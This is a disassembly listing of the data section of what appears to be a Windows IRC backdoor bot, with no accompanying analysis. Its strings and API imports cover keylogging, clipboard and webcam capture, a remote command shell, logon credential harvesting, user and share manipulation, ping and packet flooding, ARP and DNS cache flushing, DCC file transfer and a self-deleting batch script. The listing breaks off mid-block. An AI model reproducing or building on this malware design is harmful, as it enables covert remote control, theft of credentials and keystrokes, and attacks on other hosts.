unk_428544 db 2 ; DATA XREF: sub_407D4C+E1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTheWindowsLo_1 db ' The Windows logon (Pid: <%d>) information is: Domain: \\%S, Us'
db 'er: (%S/(N/A)).',0
align 4
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_407E65+C50�o
align 10h
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_407E65+C48�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_407E65:loc_408AA0�o
; _6:off_4E0BE8�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_407E65+BE6�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_407E65+BD9�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_407E65+BCC�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_407E65+BBF�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_407E65+BB2�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_407E65+BAA�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_407E65:loc_408A02�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_407E65+B68�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_407E65+B60�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_407E65:loc_4089B8�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_407E65+B0E�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_407E65+B01�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_407E65+AF4�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_407E65+AEC�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_407E65:loc_408944�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_407E65+AAA�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_407E65+AA2�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_407E65:loc_4088FA�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_407E65+A60�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_407E65+A58�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_407E65:loc_4088B0�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_407E65+9CE�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_407E65+9C1�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_407E65+9B4�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_407E65+9A7�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_407E65+99A�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_407E65+98D�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_407E65+980�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_407E65+973�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_407E65+966�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_407E65+959�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_407E65+951�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_407E65:loc_4087A5�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_407E65+903�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_407E65+8F6�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_407E65+8EE�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_407E65:loc_408746�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_407E65+8B4�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_407E65+842�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_407E65+835�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_407E65+828�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_407E65+81B�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_407E65+80E�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_407E65+801�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_407E65+7F4�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_407E65+7E7�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_407E65+7DA�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_407E65+7D2�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_407E65:loc_408626�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_407E65+688�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_407E65+67B�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_407E65+66E�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_407E65+661�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_407E65+654�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_407E65+647�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_407E65+63A�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_407E65+62D�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_407E65+620�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_407E65+613�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_407E65+60B�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_407E65+5F9�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_407E65+5EC�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_407E65+5DF�o
align 4
aSend db 'send',0 ; DATA XREF: sub_407E65+5D2�o
; sub_40D2E0+220D�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_407E65+5C5�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_407E65+5B8�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_407E65+5AB�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_407E65+59E�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_407E65+591�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_407E65+584�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_407E65+577�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_407E65+56A�o
aSocket db 'socket',0 ; DATA XREF: sub_407E65+55D�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_407E65+550�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_407E65+543�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_407E65+536�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_407E65+529�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_407E65+51C�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_407E65+50F�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_407E65+507�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_407E65+4F6�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_407E65+483�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_407E65+476�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_407E65+469�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_407E65+45C�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_407E65+44F�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_407E65+442�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_407E65+435�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_407E65+428�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_407E65+420�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_407E65:loc_408274�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_407E65:loc_40824C�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_407E65+38F�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_407E65+382�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_407E65+375�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_407E65+368�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_407E65+35B�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_407E65+34E�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_407E65+341�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_407E65:loc_40819E�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_407E65+309�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_407E65+2FC�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_407E65:loc_408159�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_407E65+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_407E65+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_407E65+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_407E65+285�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_407E65+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_407E65+270�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_407E65:loc_4080C4�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_407E65+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_407E65+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_407E65+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_407E65:loc_40805D�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_407E65+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_407E65+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_407E65+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_407E65+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_407E65+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_407E65+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_407E65+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_407E65+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_407E65:loc_407F9A�o
; sub_41F17E+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_407E65:loc_407F6D�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_407E65+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_407E65+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_407E65+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_407E65+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_407E65+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_407E65+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_407E65+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_407E65+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_407E65+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_407E65+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_407E65+23�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_407E65+A�o
align 4
unk_428E7C db 2 ; DATA XREF: sub_408AF2+2F2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Fh, 72h
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDllTestComplet db ' DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+2CC�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+1FC�o
align 10h
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_408AF2+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_40907B+72�o
align 4
aMirc db 'mIRC',0 ; DATA XREF: sub_409140+5�o
; sub_4140CC+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4091C2+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_409266+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_409288+140�o
align 10h
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_409288+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_409288+48�o
align 10h
unk_4290C0 db 2 ; DATA XREF: sub_409448:loc_409507�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aNotSupportedBy db ' Not supported by this system.',0
align 10h
unk_429100 db 2 ; DATA XREF: sub_409448:loc_4094D5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aUnableToAlloca db ' Unable to allocation ARP cache.',0
align 10h
unk_429140 db 2 ; DATA XREF: sub_409448:loc_4094A1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheIsEmpt db ' ARP cache is empty.',0
align 4
unk_429174 db 2 ; DATA XREF: sub_409448+49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorGettingAr db ' Error getting ARP cache: <%d>.',0
align 4
unk_4291B4 db 2 ; DATA XREF: sub_4095CC+13C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFinishedSendin db ' Finished sending pings to %s.',0
align 10h
unk_4291F0 db 2 ; DATA XREF: sub_4095CC+6E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPi db ' Error sending pings to %s.',0
align 4
dword_429228 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409758+1C6�o
dd 2BBBB02h
aFinishedSend_0 db ' Finished sending packets to %s.',0
align 4
dword_429264 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409758+8E�o
dd 2BBBB02h
aErrorSending_0 db ' Error sending pings to %s.',0
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_4099D6+33�o
dword_4292AC dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409A5D:loc_409B8F�o
dd 2BBBB02h
aCouldNotReadDa db ' Could not read data from proccess.',0Dh,0Ah,0
align 4
dword_4292EC dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409A5D+10F�o
dd 2BBBB02h
aProccessHasTer db ' Proccess has terminated.',0Dh,0Ah,0
align 4
dword_429324 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409A5D:loc_409B43�o
dd 2BBBB02h
aCouldNotRead_0 db ' Could not read data from proccess',0Dh,0Ah,0
align 4
dword_429364 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409BB2+194�o
dd 2BBBB02h
aFailedToStartI db ' Failed to start IO thread, error: <%d>.',0
align 4
dword_4293A8 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_409BB2+14C�o
dd 2BBBB02h
aRemoteCommandP db ' Remote Command Prompt',0
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_409BB2+21�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_409D67+52�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_409F1E+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_409F1E+192�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_409F1E:loc_40A082�o
align 4
word_4294E8 dw 3Fh ; DATA XREF: sub_409F1E:loc_40A020�r
; sub_40B6AD+1F�o
align 4
dword_4294EC dd 28207325h, 297325h ; DATA XREF: sub_409F1E+EB�o
dword_4294F4 dd 3F3F3Fh ; DATA XREF: sub_409F1E:loc_409FE1�o
; _0:loc_41407D�o
a2003 db '2003',0 ; DATA XREF: sub_409F1E+BA�o
align 10h
aXp db 'XP',0 ; DATA XREF: sub_409F1E+AA�o
; _0:00414068�o
align 4
a2k db '2K',0 ; DATA XREF: sub_409F1E+98�o
; _0:00414058�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_409F1E+7E�o
; _0:0041403F�o
align 4
a98 db '98',0 ; DATA XREF: sub_409F1E+6C�o
; _0:0041402F�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_409F1E+5A�o
; _0:0041401F�o
align 4
a95 db '95',0 ; DATA XREF: sub_409F1E+46�o
; _0:00414011�o
align 4
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_40A1D2+A4�o
align 4
off_429558 dd offset loc_412F49+5 ; DATA XREF: sub_40A1D2:loc_40A23E�o
off_42955C dd offset dword_4E414C ; DATA XREF: sub_40A1D2:loc_40A234�o
dword_429560 dd 6C616944h, 70752Dh ; DATA XREF: sub_40A1D2+5B�o
dword_429568 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h ; DATA XREF: sub_40A1D2+48�o
unk_429578 db 2 ; DATA XREF: sub_40A291:loc_40A44A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToConnec db 'Failed to connect to HTTP server.',0
align 4
unk_4295B8 db 2 ; DATA XREF: sub_40A291:loc_40A443�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aCouldNotOpenAC db 'Could not open a connection.',0
align 4
dword_4295F4 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40A291+1A0�o
dd 0BB022029h, 202002BBh, 61766E49h, 2064696Ch, 2E4C5255h
dd 0
unk_429620 db 2 ; DATA XREF: sub_40A291:loc_40A424�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToGetReq db 'Failed to get requested URL from HTTP server.',0
align 4
dword_42966C dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40A291+18C�o
dd 0BB022029h, 202002BBh, 204C5255h, 69736976h, 2E646574h
dd 0
dword_429698 dd 2A2F2Ah ; DATA XREF: sub_40A291+3B�o
dword_42969C dd 202E6425h, 3D207325h, 732520h ; DATA XREF: sub_40A53B+35�o
dword_4296A8 dd 6C415B2Dh, 20736169h, 7473694Ch, 2D5Dh ; DATA XREF: sub_40A53B+10�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_40A5B3+60�o
align 4
dword_4296DC dd 7A026E02h, 201F6D1Fh, 676F6C28h, 1F702E73h, 29671F6Ch
; DATA XREF: sub_40A653+1A�o
dd 0BBBB0220h, 20202002h, 61656C43h, 2E646572h, 0
dword_429704 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40A693+DC�o
dd 2BBBB02h, 694C2020h, 63207473h, 6C706D6Fh, 2E657465h
dd 0
dword_429730 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40A693+3F�o
dd 2BBBB02h, 65422020h, 6E6967h
dword_429750 dd 80000002h, 42ADE4h, 80000002h, 42AE14h, 80000001h, 42AE4Ch
; DATA XREF: sub_40A7C2+7�o
dword_429768 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40A7C2+63�o
; sub_40A965+170�o
dd 2BBBB02h
aFailedToSendTo db ' Failed to send to Remote command shell.',0
align 4
dword_4297AC dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40A965+AB�o
dd 2BBBB02h
aFailedToOpenRe db ' Failed to open remote command shell.',0
align 4
dword_4297EC dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40A965+47�o
; sub_40AB26+FD�o
dd 2BBBB02h
aFailedToOpenSo db ' Failed to open socket.',0
align 10h
dword_429820 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+362�o
; sub_40AEC8+156�o
dd 2BBBB02h, 6F532020h, 74656B63h, 72726520h, 2E726Fh
dword_429848 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+2FA�o
dd 2BBBB02h
aTransferComple db ' Transfer complete to IP: %s, Filename: %s (%s bytes).',0
dword_429898 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+202�o
dd 2BBBB02h
aUnableToOpenSo db ' Unable to open socket.',0
align 4
dword_4298CC dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+1CB�o
dd 2BBBB02h, 65532020h, 7420646Eh, 6F656D69h, 2E7475h
dword_4298F4 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_40AB26+16A�o
dd 169h
dword_42990C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+127�o
dd 2BBBB02h
aFileDoesnTExis db ' File doesn',27h,'t exist.',0
align 4
dword_42993C dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+82�o
dd 2BBBB02h
aFailedToBindTo db ' Failed to bind to socket.',0
dword_429970 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AB26+44�o
dd 2BBBB02h
aFailedToCreate db ' Failed to create socket.',0
align 4
dword_4299A4 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AEC8+1D1�o
dd 2BBBB02h
aTransferComp_0 db ' Transfer complete from IP: %s, Filename: %s (%s bytes).',0
align 4
dword_4299F8 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AEC8+CB�o
dd 2BBBB02h
aErrorOpeningSo db ' Error opening socket.',0
dword_429A28 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AEC8+AB�o
dd 2BBBB02h
aErrorOpeningFi db ' Error opening file for writing.',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_40AEC8+97�o
dword_429A68 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40AEC8+83�o
dd 2BBBB02h
aErrorUnableToW db ' Error unable to write file to disk.',0
align 4
unk_429AA8 db 2 ; DATA XREF: sub_40B105+493�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aBadUrlOrDnsErr db ' Bad URL, or DNS Error: %s.',0
align 4
unk_429AE4 db 2 ; DATA XREF: sub_40B105+485�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
